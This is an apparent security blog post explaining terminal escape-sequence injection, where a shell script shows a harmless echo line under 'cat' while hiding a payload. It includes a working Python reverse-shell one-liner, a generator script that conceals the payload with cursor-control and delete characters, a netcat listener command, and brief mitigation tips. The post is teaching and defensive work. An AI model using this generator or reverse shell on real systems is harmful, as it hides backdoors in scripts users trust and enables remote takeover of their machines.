Featured image of post 0x02 Terminal Injection

0x02 Terminal Injection

What happens when you run scripts without checking the contents properly?

Krystian Bajno

Users frequently execute scripts without examining their contents, thereby exposing themselves to potential unintended consequences or security risks.

Downloading and executing scripts such as

1
$ sh -c '$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)'

It is recommended to always check what is inside of the script.

How many times have you run the script, checking it superficially with a “cat” command beforehand? What if you’ve done that, and still managed to accidentally run malware on the machine?

Terminal Injection

**“A terminal escape sequence is a special sequence of characters that is printed (like any other text). But, if the terminal understands the sequence, it won’t display the character-sequence, but will perform some action.”

Impostor:

1
echo -n Hello there! This is todays date: $(date)

Payload:

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

Generator:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python 
import sys  

DELETE_CHAR = "\x7F" 
NEWLINE_CHAR = '\x0a'

def read_file(file):
  with open(file) as file_handle:
    return "".join(file_handle.readlines())  

def move_lines_up(line_count):
  return "\033[" + str(line_count) + "A"
   
def move_to_line_beginning():     
  return "\033[F"
  
def build_executable(impostor, shellcode):
  executable = shellcode
  executable += move_lines_up(shellcode.count(NEWLINE_CHAR) + 1)
  executable += move_to_line_beginning()
  executable += impostor + DELETE_CHAR * (len(shellcode) - len(impostor))     
  return executable
    
def main():    
  shellcode = read_file(sys.argv[1])    
  impostor = read_file(sys.argv[2])
  
  executable = build_executable(impostor, shellcode) 
      
  with open('./poc.sh', 'w') as file:       
    file.write(executable)  
  
if __name__ == "__main__":     
  main()

Now as we generate our script with hidden characters, let’s check what is inside using “cat” command.

1
2
3
$ cat ./poc.sh

echo -n Hello there! This is todays date: $(date)

Seems like nothing special. Let’s start the listener and run the script.

1
nc -lvnp 9999 & chmod 755 poc.sh && ./poc.sh

We just executed arbitrary, hidden code, resulting in a compromise of the machine.

Mitigation

To prevent this, use:

1
2
3
- Command cat with -v parameter displays non-printing characters 
- Command more will reveal non printing characters in Windows environment 
- In Powershell use commandlet Write-Output

Stay safe!

K.